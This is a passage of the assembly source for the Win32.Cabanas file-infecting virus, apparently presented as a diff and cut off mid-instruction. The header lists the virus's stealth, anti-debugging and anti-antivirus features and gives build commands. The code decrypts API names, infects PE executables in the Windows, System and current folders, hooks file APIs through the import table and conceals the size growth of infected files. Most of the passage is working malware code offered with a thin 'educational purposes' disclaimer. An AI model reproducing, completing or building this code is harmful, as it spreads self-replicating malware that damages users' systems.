+; KERNEL API. But there is a bug in this undocumented method; therefore the +; method is inoperative under Windows NT. If the addresses of +; GetModuleHandleA or GetModuleHandleW functions are available in the Import +; Table of the infected file, the virus easily determines the WIN32 KERNEL +; API addresses through the GetProcAddress procedure. If the addresses are +; not available in the Import Table, the virus craftily finds the address of +; GetProcAddress from the Export Table of KERNEL32. As already mentioned, +; this virus mechanism is not operative under Windows NT due to a bug, and, +; as a consequence, the normal "activity" of the virus is disabled. This is +; the only serious bug that prevents the proliferation of Win32.Cabanas +; under Windows NT. On the contrary, in Windows 95 the virus "feels +; completely at home" and straightforwardly (even in the absence of the +; addresses of GetModuleHandleA or GetModuleHandleW) determines the base +; address of KERNEL32.DLL and GetProcAddress via an undocumented method. +; +; Using the GetProcAddress function, Win32.Cabanas can easily get the +; address of any WIN32 KERNEL API procedure that it needs. This is precisely +; what the virus does: it gets the addresses and stores them. +; +; Then Win32.Cabanas initiates its engine for infecting EXE and SCR PE-files +; in \WINDOWS, \WINDOWS\SYSTEM, and the current folder. Prior to infecting a +; file, the virus checks for a copy of its code through certain fields in +; the PE header and by the file size, which for an infected must be a +; multiple of 101. As already mentioned, the virus searches for the names of +; GetModuleHandleA, GetModuleHandleW or GetProcAddress in the Import Table +; and saves the references to their addresses. Then it appends its code at +; the file end in the last segment section (usually, .reloc) after modifying +; the characteristics and size of this section. Thereafter, the virus +; replaces the five initial bytes of the original entry point of the code +; section (usually, .text or CODE) by a command for transferring control to +; the virus code in the last segment section (.reloc). For this purpose, the +; virus examines the relocation table (.reloc) for finding some element in +; the region of bytes that the virus had modified. If any, the virus +; "disables" the reference and stores its address and value for restoring +; the initial bytes of the entry point at the time of transfer of control +; to the host program and, if necessary, for appropriately configuring the +; relocation. +; +; After infecting all files that yield to infection in \WINDOWS, \WINDOWS\ +; SYSTEM, and in the current folder, the virus plants a resident copy into +; the system and "intercepts" the necessary system functions. Using +; VirtualAlloc, the virus allots for itself 12232 bytes in the memory and +; plants its code there. Then it tries to "intercept" the following WIN32 +; KERNEL API functions: GetProcAddress, GetFileAttributesA, +; GetFileAttributesW, MoveFileExA, MoveFileExW, _loopen, CopyFileA, +; CopyFileW, OpenFile, MoveFileA, MoveFileW, CreateProcessA, CreateProcessW, +; CreateFileA, CreateFileW, FindClose, FindFirstFileA, FindFirstFileW, +; FindNextFileA, FindNextFileW, SetFileAttrA, and SetFileAttrW. The virus +; "picks up" the addresses of these functions from the Import Table, and +; writes the addresses of its handlers in the Import Table. On failing to +; "intercept" certain necessary functions, the virus, when the host program +; calls for the GetProcAddress function, verifies whether this function is +; necessary for the host program, and returns the address of the virus +; procedure to host program if necessary. When a program calls for certain +; functions that have been "intercepted" by Win32.Cabanas, the file +; infection engine and/or the stealth mechanism are\is initialized. Thus, +; when FindFirstFileA, FindFirstFileW, and FindNextFileA or FindNextFileW +; functions are called, the virus may infect the file which is being +; searched and hide the increase in the infected file size. +; +; Win32.Cabanas cannot be regarded as a "true resident" virus, because it +; "intercepts" system functions and installs its copy in a specific memory +; area only in the current session of an infected program. But what will +; happen on starting, for example, an infected Norton Commander for Windows +; 95 or Command Interpreter for Windows NT? Or a resident program? Indeed, +; Win32.Cabanas will also "work hard" side by side with such a program until +; it is terminated. +; +; Win32.Cabanas contains an encrypted text string +; "(c) Win32.Cabanas v1.0 by jqwerty/29A" +; +; (c) 1997 DialogueScience, Inc., Moscow, Russia. All rights reserved. +; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 +; +; +; 3. Main featurez +; 哪哪哪哪哪哪哪哪 +; * Platformz: WindowsNT, Windows95, Win32s, i.e. all Win32 platformz. +; * Residency: Yes, "Per Process", workin on all Win32 systemz. +; * Non-Residency: Yes, direct action, infects PEz before goin resident. +; * Stealth: Yes, size stealth of inf.filez (F-Potatoe95 fooled). +; * AntiDebuging: Yes, TD32 or any other "aplication" level debuger +; generates an exception when debugin an infected +; aplication. This obviosly doesnt aply for Soft-ICE +; for Windows95, a big monster. +; * AntiHeuristicz: Yes, inf.filez have no obvious symptomz of infection. +; Other Win95 virusez tend to "mark" the PE header so +; they are easily noticeable. See: Other featurez (e). +; * AntiAntivirus: Yes, disinfection of inf.filez is almost *imposible*. +; * Fast infection: Yes, filez are infected when accesed for any reason. +; * Polymorphism: No, the poly engine was stripped and removed on purpose. +; * Other featurez: +; (a) The EntryPoint field in the PE hdr is not modified. +; (b) Win32 file API functionz are hooked for infection and +; stealth purposez but also for platform compatibility. +; (c) Use of the Win32 "File-Maping" API functionz, thus +; implementin "Memory-Mapped Filez". No more "ReadFile", +; "SetFilePointer", "WriteFile"... it was about time. +; (d) Absolutely no use of absolute adressez in sake of +; compatibility with other future Win32 releasez. +; (e) The SHAPE AV program sucks, but sadly it was the best +; thing detectin PE infected filez heuristicaly. Well +; almost as it didnt triger a single flag on this one :) +; (f) Use of "Structured Exception Handling" (SEH) in those +; critical code fragmentz that could generate GP faultz, +; i.e. exceptionz are intercepted and handled properly. +; (g) Unicode suport. This babe really works in NT. No lie. +; +; +; 4. Who was Cabanas? +; 哪哪哪哪哪哪哪哪哪 +; Gonzalo Cabanas used to be a daydream believer. We shared several thingz +; in comon, heard same R.E.M music style, wore the same ragged blue jeanz, +; and behaved like kidz everywhere we went together, putin tackz on the tea- +; cher's chair, stealin some classmate's lunch and so on. We even liked the +; same girlz, which explains why we sometimez ended up punchin each other's +; face from time to time. However, u could find us the next day, smoking a- +; round by the skoolyard as if nothin had ever hapened. We were the best +; friendz ever. I know this virus wont return him back to life, nor "will do +; him justice", however, i still wanted to somewhat dedicate this program in +; his honor. +; +; +; 5. Greetz +; 哪哪哪哪 +; The greetz go to: +; +; Gonzo Cabanas ......... Hope to see u somewhere in time.. old pal! +; Murkry ................ Whoa.. i like yer high-tech ideaz budie! +; VirusBuster/29A ....... U're the i-net man pal.. keep doin it! +; Vecna/29A ............. Keep up the good work budie.. see ya! +; l- .................... Did ya ask for some kick-ass lil' creature? X-D +; Int13 ................. Hey pal.. u're also a southamerican rocker! ;) +; Peter/F-Potatoe ....... Yer description rulez.. Mikko's envy shines! +; DV8 (H8), kdkd, etc ... Hey budiez.. now where da hell are u? +; GriYo, Sandy/29A ...... Thx for yer patience heh X-D +; +; +; 6. Disclaimer +; 哪哪哪哪哪哪 +; This source code is for educational purposez only. The author is not res- +; ponsable for any problemz caused due to the assembly of this file. +; +; +; 7. Compiling it +; 哪哪哪哪哪哪哪 +; tasm32 -ml -m5 -q -zn cabanas.asm +; tlink32 -Tpe -c -x -aa cabanas,,, import32 +; pewrsec cabanas.exe +; +; +; (c) 1997 Jacky Qwerty/29A. + + +.386p ;generate 386+ protected mode instructionz +.model flat ;no segmentz and a full 32-bit offset.. what a dream ;) + +;Some includez containin very useful structurez and constantz for Win32 + +include Useful.inc +include Win32API.inc +include MZ.inc +include PE.inc + +;Some equ's needed by the virus + +nAPIS = 1*1024 ;size of jump table holdin hooked APIz +nHANDLEZ = 2*1024 + 512 ;size of Handlez table +nPATHNAMEZ = 4*1024 + 512 ;size of PathNamez table + +extrn GetModuleHandleA :proc ;APIz used durin first generation only +extrn GetProcAddress :proc + +.data + db ? ;some dummy data so tlink32 dont yell + +.code + +;Virus code starts here + +v_start: + + call get_base + +code_table: + + dd 12345678h ;host RVA entry point + dw 1 ;number of bytez + db ? ;bytez to patch + dw 0 ;end of parameter block + +code_start: + +;Packed APIz needed by the virus. They will travel in packed/encrypted form + +ve_stringz: + +veszKernel32 db 'KERNEL32',0 +veszGetModuleHandleA db 'GetModuleHandleA' +veszGetModuleHandleW db 80h,17 + +eExts db 'fxEtcR',0 ;list of file extensionz + +veszGetProcAddress db 'GetProcAddress',0 +veszGetFileAttributesA db 'Ge','t'+80h,'AttributesA' +veszGetFileAttributesW db 80h,19 +veszMoveFileExA db 'Mov','e'+80h,'ExA' +veszMoveFileExW db 80h,12 +vesz_lopen db '_lopen',0 +veszCopyFileA db 'Cop','y'+80h,'A' +veszCopyFileW db 80h,10 +veszOpenFile db 'Ope','n'+80h,0 +veszMoveFileA db 'Mov','e'+80h,'A' +veszMoveFileW db 80h,10 +veszCreateProcessA db 'CreateProcessA' +veszCreateProcessW db 80h,15 +veszCreateFileA db 'Creat','e'+80h,'A' +veszCreateFileW db 80h,12 +veszFindClose db 'FindClose',0 +veszFindFirstFileA db 'FindFirs','t'+80h,'A' +veszFindFirstFileW db 80h,15 +veszFindNextFileA db 'FindNex','t'+80h,'A' +veszFindNextFileW db 80h,14 +veszSetFileAttributesA db 'Se','t'+80h,'AttributesA' +veszSetFileAttributesW db 80h,19 +veszCloseHandle db 'CloseHandle',0 +veszCreateFileMappingA db 'Creat','e'+80h,'MappingA',0 +veszMapViewOfFile db 'MapViewO','f'+80h,0 +veszUnmapViewOfFile db 'UnmapViewO','f'+80h,0 +veszSetFilePointer db 'Se','t'+80h,'Pointer',0 +veszSetEndOfFile db 'SetEndO','f'+80h,0 +veszSetFileTime db 'Se','t'+80h,'Time',0 +veszGetWindowsDirectory db 'GetWindowsDirectoryA',0 +veszGetSystemDirectory db 'GetSystemDirectoryA',0 +veszGetCurrentProcess db 'GetCurrentProcess',0 +veszGetModuleFileName db 'GetModul','e'+80h,'NameA',0 +veszWriteProcessMemory db 'WriteProcessMemory',0 +veszWideCharToMultiByte db 'WideCharToMultiByte',0 +veszVirtualAlloc db 'VirtualAlloc',0 + +eEndOfFunctionNamez db 0 + +;Copyright and versionz + +eszCopyright db "(c) Win32.Cabanas v1.1 by jqwerty/29A.",0 + +ve_string_size = $ - ve_stringz + +get_base: + + mov ecx,ve_string_size ;get size of packed/encrypted stringz + mov esi,[esp] ;get pointer to packed/encrypted stringz + xor ebx,ebx + mov eax,esi + sub esi,ecx + cld + sub dword ptr [esp],code_table - seh_fn + add esi,[eax - 4] + push dword ptr fs:[ebx] ;set SEH frame.. ever seen FS in action? X-D + lea edi,[esi + pCodeTable - ve_stringz] + stosd ;save pointer to code_table + add eax,12345678h +delta_host = dword ptr $ - 4 + stosd ;save actual host base adress + mov eax,esi + stosd ;save pointer to virus start + +ebp_num = ddGetProcAddress + 7Fh +tmp_edi = pcode_start + 4 + + mov fs:[ebx],esp + pushad + xchg eax,[ebx - 2] ;go away lamerz and wannabeez.. + db 2Dh + +seh_rs: sub edi,tmp_edi - v_stringz ;get pointer to KERNEL32 API name + pop eax + push edi ;pass the pointer twice + push edi + +decrypt_stringz: ;decrypt/unpack API namez and other stringz + + lodsb + rol al,cl + xor al,0B5h + jns d_stor + add al,-80h + jnz d_file + stosb ;expand/unpack unicode API name + xor eax,eax + lodsb + push esi + xchg ecx,eax + mov esi,edx + rep movsb + xchg ecx,eax + sub byte ptr [edi - 2],'A'-'W' + pop esi + jmp d_updt +d_file: stosb + xor eax,eax + sub eax,-'eliF' ;expand to 'File' where aplies + stosd + cmp al,? + org $ - 1 +d_stor: stosb + jnz d_loop +d_updt: mov edx,edi +d_loop: loop decrypt_stringz ;get next character + + call MyGetModuleHandleA ;get KERNEL32 base adress (first try) + pop esi + jnz gotK32 ;jump if found + sub ecx,ecx + xor eax,eax + mov cl,9 + push edi + cld + +copy_K32W: ;make unicode string for KERNEL32 + + lodsb + stosw + loop copy_K32W + call MyGetModuleHandleW ;get KERNEL32 base adress (second try) + jnz gotK32 ;jump if found + call MyGetModuleHandleX ;get KERNEL32 base adress (third try) + jnz gotK32 ;jump if found + +quit_app: + + pop eax ;shit.. KERNEL32 base adress not found + ret ;try to quit aplication via an undocumented way + + db 67h ;some prefix to confuse lamerz +seh_fn: mov eax,[esp.EH_EstablisherFrame] + lea esp,[eax - cPushad] + popad + xor eax,eax + lea ebp,[edi + ebp_num - tmp_edi] + pop dword ptr fs:[eax] ;remove SEH frame + jmp seh_rs + +gotK32: mov [ebp + K32Mod - ebp_num],eax ;store KERNEL32 base adress + cmp dword ptr [ebp + ddGetProcAddress - ebp_num],0 + xchg ebx,eax + jnz find_APIs ;got RVA pointer to GetProcAdress API? + lea esi,[ebp + vszGetProcAddress - ebp_num] + call MyGetProcAddressK32 ;no, get adress of GetProcAdress directly + jecxz find_APIs + lea eax,[ebp + ddGetProcAddress2 - ebp_num] + mov [eax],ecx + sub eax,[ebp + phost_hdr - ebp_num] + mov [ebp + ddGetProcAddress - ebp_num],eax + +find_APIs: ;find file related API adressez from KERNEL32.. + + lea esi,[ebp + FunctionNamez - ebp_num] + lea edi,[ebp + FunctionAdressez - ebp_num] + +GetAPIAddress: + + call MyGetProcAddressK32 ;get API adress + jecxz quit_app + cld + xchg eax,ecx + stosd ;save retrieved API adress + @endsz ;point to next API name + cmp [esi],al ;end of API namez reached? + jnz GetAPIAddress ;no, get next API adress + + lea ebx,[ebp + Process_Dir - ebp_num] + lea edi,[ebp + PathName - ebp_num] + push 7Fh + push edi + call [ebp + ddGetWindowsDirectoryA - ebp_num] + call ebx ;infect filez in WINDOWS directory + push 7Fh + push edi + call [ebp + ddGetSystemDirectoryA - ebp_num] + call ebx ;infect filez in SYSTEM directory + xor eax,eax + mov byte ptr [edi],'.' + inc eax + call ebx ;infect filez in current directory + +build_host: ;rebuild the host.. + + mov esi,[ebp + pCodeTable - ebp_num] ;get code table of host + mov ebx,[ebp + phost_hdr - ebp_num] ;get host base adress + cld + lodsd + add eax,0B2FD26A3h ;decrypt original entry point RVA +add_1st_val = dword ptr $ - 4 + xchg edi,eax + add edi,ebx + push edi ;save entry point for l8r retrieval + +get_count: + + call [ebp + ddGetCurrentProcess - ebp_num] ;get pseudo-handle for current process + xchg ecx,eax + cld + lodsw ;get number of bytes to copy + cwde + xchg ecx,eax + mov edx,ecx + push ecx ;push parameterz to WriteProcessMemory API + push eax + push esp + push ecx + push esi + push edi + push eax + +decrypt_hostcode: ;decrypt the chunk of original host code previosly encrypted.. + + lodsb + xor al,06Ah +xor_2nd_val = byte ptr $ - 1 + rol al,cl + mov [esi-1],al + loop decrypt_hostcode + sub ecx,12345678h +old_base = dword ptr $ - 4 + add ecx,ebx ;has host base adress been relocated? + jz write_chunk ;no, relocation fix not necesary.. jump + + ;fix code pointed to by one or more nulified relocationz.. + + pushad ;get RVA start of relocation section.. + lea esi,[ebx.MZ_lfanew] + sub edi,ebx + add esi,[esi] + mov ecx,[esi.NT_OptionalHeader \ ;get size of relocation dir. + .OH_DirectoryEntries \ + .DE_BaseReloc \ + .DD_Size \ + -MZ_lfanew] + jecxz _popad + mov esi,[esi.NT_OptionalHeader \ ;get RVA to relocation section + .OH_DirectoryEntries \ + .DE_BaseReloc \ + .DD_VirtualAddress \ + -MZ_lfanew] + call redo_reloc ;pass adress of fix_relocs label as a parameter + +fix_relocs: ;process relocation block and look for nulified relocationz.. + + lodsw ;get relocation item + cwde + dec eax + .if sign? + jnc f_next_reloc ;if first item, jump to get next relocation item + .endif + test ah,mask RD_RelocType shr 8 ;is relocation nulified? + jnz f_next_reloc ;no, jump to get next relocation item + lea eax,[eax + ebx + 5] + cmp edi,eax ;relocation item points inside chunk of code? + jnc f_next_reloc ;no, jump to get next relocation item + add eax,-4 + cmp eax,edx + jnc f_next_reloc ;no, jump to get next relocation item + + ;relocation item is pointing inside chunk of code.. add delta to fix it.. + + pushad + mov ebx,[esp.(4*Pshd).cPushad.Pushad_ebx] ;get actual host base adress + mov ebp,[ebx + edi - 4] + mov ecx,[esp.(3*Pshd).(2*cPushad).Arg3] ;get pointer to chunk of code inside code table + mov ebx,[ebx + edx] + xchg ebp,[ecx - 4] + sub ecx,edi + mov esi,[esp.(4*Pshd).cPushad.Pushad_ecx] ;get relocation delta to add + xchg ebx,[edx + ecx] + add [eax + ecx],esi ;add delta.. (aack! damned relocationz..) + mov [edx + ecx],ebx + popad + clc + +f_next_reloc: + + loop fix_relocs ;get next relocation item + ret + +redo_reloc: + + call get_relocs +_popad: popad + +write_chunk: + + call [ebp + ddWriteProcessMemory - ebp_num] ;write chunk of code to the code section + xchg ecx,eax + pop edx + cld + pop eax + jecxz n_host ;if error, jump and try to stay resident without jumpin back to host + xor edx,eax + lodsw ;get pointer to next chunk of code to patch, if any + jnz n_host ;if error, jump and try to stay resident without jumpin back to host + cwde + xchg ecx,eax + sub edi,ecx + jecxz go_resident ;no more chunkz, jump and try to stay resident, then jump back to host + jmp get_count ;jump and patch the next chunk +n_host: pop eax ;unwind return adress, an error occured, cant jump to host :( + +go_resident: + + lea esi,[ebp + FindData - ebp_num] + push MAX_PATH + push esi + push ecx + call [ebp + ddGetModuleFileName - ebp_num] ;get host filename + xchg ecx,eax + lea ebx,[ebp + jmp_addr_table - ebp_num] ;get pointer to start of jump adress table + jecxz g_host + call Open&MapFile ;open host filename and memory-map it +g_host: jecxz jmp_host ;if error, jump back to host + push PAGE_EXECUTE_READWRITE + push MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN + push (virtual_end2 - code_start + 3) and -4 + push esi ;NULL ;let OS choose memory adress + call [ebp + ddVirtualAlloc - ebp_num] ;allocate enough memory for virus code and bufferz + lea ecx,[ebp + FunctionNamez2 - ebp_num] ;get pointer to start of function namez to hook + mov edi,non_res - code_start + xchg ecx,eax ;get size of new allocated block + lea esi,[ecx + PathNamez - code_start] + jecxz close_jmp_host ;if error on VirtualAlloc, close file and jump to host + xchg edi,ecx ;get target adress of new allocated block + mov [ebp + pPathNamez - ebp_num],esi ;initialize pointer to store future pathnamez retrieved by Find(First/Next)File(A/W) + mov esi,edi + xchg [ebp + pcode_start - ebp_num],esi ;get source adress of virus code and store new target adress as new source adress + lea edx,[edi + ecx + jmp_table_size + 1] + mov [ebp + pNewAPIs - ebp_num],edx ;initialize pointer to store hooked APIs in the new jump table + cld + rep movsb ;copy virus code to new allocated block + mov [esi],cl ;force a null to mark the end of function namez to hook + pop ecx ;get start of memory-maped file + inc edi ;get pointer to NewAPItable + push ecx + +hook_api: ;hook API functionz, retrieve old API adress and build new API entry into jump table.. + + pushad + call IGetProcAddressIT ;get RVA pointer of API function inside import table + test eax,eax + jz next_api_hook ;if not found, jump and get next API name + add eax,[ebp + phost_hdr - ebp_num] ;convert RVA to real pointer by addin the actual host base adress + mov edx,esp + push eax + push esp + xchg esi,eax + mov al,0B8h ;build "mov eax,?" instruction into jump table + push 4 + push edx + stosb + call [ebp + ddGetCurrentProcess - ebp_num] + push esi + push eax + cld + movsd ;get and copy old API adress into jump table + call [ebp + ddWriteProcessMemory - ebp_num] ;set our API hook + cld + mov al,0E9h ;build "jmp ?" instruction to jump to new API handler + pop edx + pop ecx + stosb + movzx eax,word ptr [ebx] ;build relative offset to new API handler + sub eax,edi + add eax,[ebp + pcode_start - ebp_num] + stosd + push edi + +next_api_hook: + + popad + inc ebx + xchg esi,eax + @endsz ;get pointer to next API name + inc ebx + cmp [esi],al ;check end of API namez to hook + xchg eax,esi + jnz hook_api ;jump and get next API, if there are more APIz to hook + +close_jmp_host: + + call Close&UnmapFile ;close and unmap host file + +jmp_host: + + cld + pop eax + jmp eax ;jmp to host.. or try to quit aplication if an error ocurred while patchin the code section + +NewGetProcAddr: ;new GetProcAddress API entry point.. hook wanted API functionz from KERNEL32.. + + call APICall@n_2 ;call old GetProcAdress API and retrieve API adress in EAX + pushad + mov ecx,[esp.cPushad.Arg1] ;get module handle/base adress + call get_ebp ;get EBP to reference internal variablez correctly + xchg ecx,eax + jecxz end_getproc ;get out if retrieved API adress is zero + sub eax,[ebp + K32Mod - ebp_num] ;is it KERNEL32 base adress? + jnz end_getproc ;no, get out + lea edx,[ebp + jmp_addr_table - 2 - ebp_num] ;yea its KERNEL32, get pointer to start of jump table + lea edi,[ebp + FunctionNamez2 - 1 - ebp_num] ;get pointer to API function namez to hook + cld + +n_gproc_next_str: ;search specified API function name from the list of posible API namez to hook.. + + inc edx + scasb ;get adress to next API function name + jnz $ - 1 + mov esi,[esp.cPushad.Arg2] ;get pointer to specified API function name + inc edx + scasb + jz end_getproc ;if end of API namez reached, get out + dec edi + +n_gproc_next_chr: + + cmpsb ;do API namez match? + jnz n_gproc_next_str ;no, get next API name + dec edi + scasb + jnz n_gproc_next_chr + +n_gproc_apis_match: ;API namez match, we need to hook the API.. + + lea ebx,[ebp + NewAPItable + nAPIS - 10 - ebp_num] ;get top of jump table + mov edi,[ebp + pNewAPIs - ebp_num] ;get current pointer to build new API entry + cmp ebx,edi ;check if jump table is full + jc end_getproc ;get out if full + push edi + sub al,-0B8h ;build "mov eax,?" instruction into jump table + stosb + pop eax + xchg eax,[esp.Pushad_eax] ;retrieve old API adress and swap with the new API adress + stosd + mov al,0E9h ;build "jmp ?" instruction to jump to new API handler + stosb + movzx eax,word ptr [edx] ;build relative offset to new API handler + sub eax,edi + add eax,[ebp + pcode_start - ebp_num] + stosd + mov [ebp + pNewAPIs - ebp_num],edi ;update pointer to next API entry in the jump table + +end_getproc: + + popad + ret (2*Pshd) ;return to caller + +jmp_addr_table: ;adress table.. contains relative offsetz to new API handlerz.. + + dw NewGetProcAddr - code_start - 4 + dw NewGetFileAttrA - code_start - 4 + dw NewGetFileAttrW - code_start - 4 + dw NewMoveFileExA - code_start - 4 + dw NewMoveFileExW - code_start - 4 + dw New_lopen - code_start - 4 + dw NewCopyFileA - code_start - 4 + dw NewCopyFileW - code_start - 4 + dw NewOpenFile - code_start - 4 + dw NewMoveFileA - code_start - 4 + dw NewMoveFileW - code_start - 4 + dw NewCreateProcessA - code_start - 4 + dw NewCreateProcessW - code_start - 4 + dw NewCreateFileA - code_start - 4 + dw NewCreateFileW - code_start - 4 + dw NewFindCloseX - code_start - 4 + dw NewFindFirstFileA - code_start - 4 + dw NewFindFirstFileW - code_start - 4 + dw NewFindNextFileA - code_start - 4 + dw NewFindNextFileW - code_start - 4 + dw NewSetFileAttrA - code_start - 4 + dw NewSetFileAttrW - code_start - 4 + +jmp_table_size = $ - jmp_addr_table + +NewSetFileAttrW: ;new API handlerz (unicode version).. +NewCreateFileW: +NewCreateProcessW: +NewMoveFileW: +NewCopyFileW: +NewMoveFileExW: +NewGetFileAttrW: +CommonProcessW: + + test al,? ;clear carry (unicode version) + org $ - 1 + +NewSetFileAttrA: ;new API handlerz (ansi version).. +NewCreateFileA: +NewCreateProcessA: +NewMoveFileA: +NewOpenFile: +NewCopyFileA: +New_lopen: +NewMoveFileExA: +NewGetFileAttrA: +CommonProcessA: + + stc ;set carry (ansi version) + pushad + call get_ebp2_Uni2Ansi ;get EBP to reference internal variablez correctly and convert unicode string to ansi (for unicode version APIz) + jecxz jmp_old_api + call findfirst ;get atributez, size of file and check if it exists + jz jmp_old_api + dec eax + push eax ;save search handle + @copysz ;copy filename to an internal buffer + call Process_File2 ;try to infect file.. + +NCF_close: + + call [ebp + ddFindClose - ebp_num] ;close file search + +jmp_old_api: + + popad + jmp eax ;jump to original API adress + +NewFindFirstFileW: ;new findfirst API handler.. infect files, stealth (unicode version) + + test al,? ;clear carry (unicode version) + org $ - 1 + +NewFindFirstFileA: ;new findfirst API handler.. infect files, stealth (ansi version) + + stc ;set carry (ansi version) + call APICall@n_2 ;call old findfirst API + pushad + inc eax ;if any error, get out + jz go_ret_2Pshd + dec eax + jz go_ret_2Pshd + call get_ebp2_Uni2Ansi ;get EBP to reference internal variablez correctly and convert unicode string to ansi (for unicode version APIz) + jecxz go_ret_2Pshd + mov edi,[ebp + pPathNamez - ebp_num] ;get pointer to new entry in pathnamez table + lea ebx,[ebp + PathNamez + nPATHNAMEZ - MAX_PATH - ebp_num] ;get top of pathnamez table + cmp edi,ebx + jnc go_ret_2Pshd ;if not enough space to store filename, jump + mov ebx,edi + @copysz ;copy filename to pathnamez table +next2_ff: mov al,[edi - 1] ;get end of path.. + add al,-'\' + jz eop_ff + sub al,':' - '\' + jz eop_ff + dec edi + cmp ebx,edi + jc next2_ff + xor al,al +eop_ff: stosb ;force null to split path from filename + mov [ebp + pPathNamez - ebp_num],edi ;update pointer to next entry in pathnamez table + call get_handle_ofs_0 ;get new free entry in handlez table + jc go_ret_2Pshd + mov eax,[esp.Pushad_eax] ;get handle returned by findfirst + stosd ;store handle into handlez table + xchg eax,ebx + stosd ;store pointer to asociated pathname into handlez table as well + mov [ebp + pHandlez - ebp_num],edi ;update pointer to next entry in handlez table + xchg esi,eax + jmp FindCommon + +go_ret_2Pshd: popad ;return to caller + ret (2*Pshd) + +NewFindNextFileW: ;new findnext API handler.. infect files, stealth (unicode version) + + test al,? ;clear carry (unicode version) + org $ - 1 + +NewFindNextFileA: ;new findnextt API handler.. infect files, stealth (ansi version) + + stc ;set carry (ansi version) + call APICall@n_2 ;call old findnext API + pushad + call get_handle_ofs_ebp ;get correct entry in handlez table acordin to handle + jc go_ret_2Pshd + mov esi,[edi + 4] ;get respective pathname + +FindCommon: lea edi,[ebp + PathName - ebp_num] + @copysz ;copy pathname to respective buffer + dec edi + mov ebx,[esp.cPushad.Arg2] ;get WIN32_FIND_DATA parameter + or al,[ebp + uni_or_ansi - ebp_num] ;check if its ansi or unicode + lea esi,[ebx.WFD_szFileName] ;get filename + jnz its_ansi_fc + call Uni2Ansi ;its unicode, convert to ansi and atach filename to pathname +its_ansi_fc: call Process_File3 ;try to infect file + call get_size ;get file size + jnz go_ret_2Pshd + test [ebx.WFD_nFileSizeLow.hiw.hib],11111100b ;filesize > 64MB? + jnz go_ret_2Pshd ;yea, file too large, jump + div ecx + dec edx + jns go_ret_2Pshd ;if not infected, jump, stealth not necesary + call check_PE_file ;file is infected, do size stealth + jmp go_ret_2Pshd + +NewFindCloseX: mov cl,1 + call APICall@n ;call old findclose API + pushad + call get_handle_ofs_ebp ;get correct entry in handlez table acordin to handle + jc go_ret_Pshd + lea esi,[edi + 4] + mov ecx,[ebp + pHandlez - ebp_num] + lodsd + sub ecx,esi + pushad + xchg esi,eax ;remove pathname entry + mov ecx,[ebp + pPathNamez - ebp_num] + mov edi,esi + @endsz + sub ecx,esi + mov [esp.Pushad_ebx],ecx + rep movsb + mov [ebp + pPathNamez - ebp_num],edi ;update pointer to handlez table + popad + shr ecx,3 ;remove handle entry + jz setH_fc +FixpPathNamez: movsd + lodsd + sub eax,ebx + stosd + loop FixpPathNamez +setH_fc: mov [ebp + pHandlez - ebp_num],edi ;update pointer to pathnamez table +go_ret_Pshd: popad + ret (Pshd) + +Open&MapFile proc ;open and map file in read only mode + ; on entry: + ; ESI = pszFileName (pointer to file name) + ; on exit: + ; ECX = 0, if error + ; ECX = base adress of memory-maped file, if ok + + xor edi,edi + +Open&MapFileAdj: ;open and map file in read/write mode + ; on entry: + ; EDI = file size + work space (in bytes) + ; ESI = pszFileName (pointer to file name) + ; on exit: + ; ECX = 0, if error + ; ECX = base adress of memory-maped file, if ok + ; EDI = old file size + + xor eax,eax + push eax ;0 + push eax ;FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push eax ;NULL + mov al,1 + push eax ;FILE_SHARE_READ + ror eax,1 ;GENERIC_READ + mov ecx,edi + jecxz $ + 4 + rcr eax,1 ;GENERIC_READ + GENERIC_WRITE + push eax + push esi ;pszFileName + call [ebp + ddCreateFileA - ebp_num] ;open file + cdq + xor esi,esi + inc eax + jz end_Open&MapFile ;if error, jump + dec eax + push eax ;push first handle + + push edx ;NULL + push edi ;file size + buffer size + push edx ;0 + mov dl,PAGE_READONLY + mov ecx,edi + jecxz $ + 4 + shl dl,1 ;PAGE_READWRITE + push edx + push esi ;NULL + push eax ;handle + call [ebp + ddCreateFileMappingA - ebp_num] ;create file mapping + cdq + xchg ecx,eax + jecxz end_Open&MapFile2 ;if error, close handle and jump + push ecx ;push second handle + + push edi ;file size + buffer size + push edx ;0 + push edx ;0 + mov dl,FILE_MAP_READ + test edi,edi + .if !zero? + shr dl,1 ;FILE_MAP_WRITE + mov edi,[ebx.WFD_nFileSizeLow] + .endif + push edx + push ecx ;handle + call [ebp + ddMapViewOfFile - ebp_num] ;map view of file + xchg ecx,eax + jecxz end_Open&MapFile3 + push ecx ;push base adress of memory-maped file + + jmp [esp.(3*Pshd).RetAddr] ;jump to return adress leavin parameterz in the stack + +Open&MapFile endp + +Close&UnmapFile proc ;close and unmap file previosly opened in read only mode + + xor edi,edi + +Close&UnmapFileAdj: ;close and unmap file previosly opened in read/write mode + + pop [esp.(4*Pshd).RetAddr - Pshd] + call [ebp + ddUnmapViewOfFile - ebp_num] ;unmap view of file + +end_Open&MapFile3: + + call [ebp + ddCloseHandle - ebp_num] ;close handle + mov ecx,edi + jecxz end_Open&MapFile2 ;if read-only mode, jump + pop eax + push eax + push eax + xor esi,esi + push esi + push esi + push edi + push eax + xchg edi,eax + call [ebp + ddSetFilePointer - ebp_num] ;move file pointer to the real end of file + call [ebp + ddSetEndOfFile - ebp_num] ;truncate file at real end of file + lea eax,[ebx.WFD_ftLastWriteTime] + push eax + push esi + push esi + push edi + call [ebp + ddSetFileTime - ebp_num] ;restore original date/time stamp field + +end_Open&MapFile2: + + call [ebp + ddCloseHandle - ebp_num] ;close handle + +end_Open&MapFile: + + xor ecx,ecx + ret + +Close&UnmapFile endp + +get_ebp2_Uni2Ansi: ;this function sets EBP register to reference internal + ; variablez correctly and also converts unicode + ; strings to ansi (for unicode version APIz only). + ;this function is only useful at the resident stage. + ;on entry: + ; TOS+28h (Pshd.cPushad.Arg1): pointer to specified file name + ;on exit: + ; ECX = 0, if error + + mov esi,[esp.(Pshd).cPushad.Arg1] ;get source pointer to specified file name + call get_ebp2 ;get actual EBP + lea edi,[ebp + PathName - ebp_num] ;get target pointer to internal buffer + jc ansiok + +Uni2Ansi: ;this function converts an ansi string to a unicode string + ;on entry: + ; ESI = pointer to specified file name + ;on exit: + ; ECX = 0, if error + + xor eax,eax + push eax ;NULL + push eax ;NULL + push MAX_PATH + push edi ;target pointer + push -1 + push esi ;source pointer + push eax + push eax ;CP_ACP + call [ebp + ddWideCharToMultiByte - ebp_num] + mov 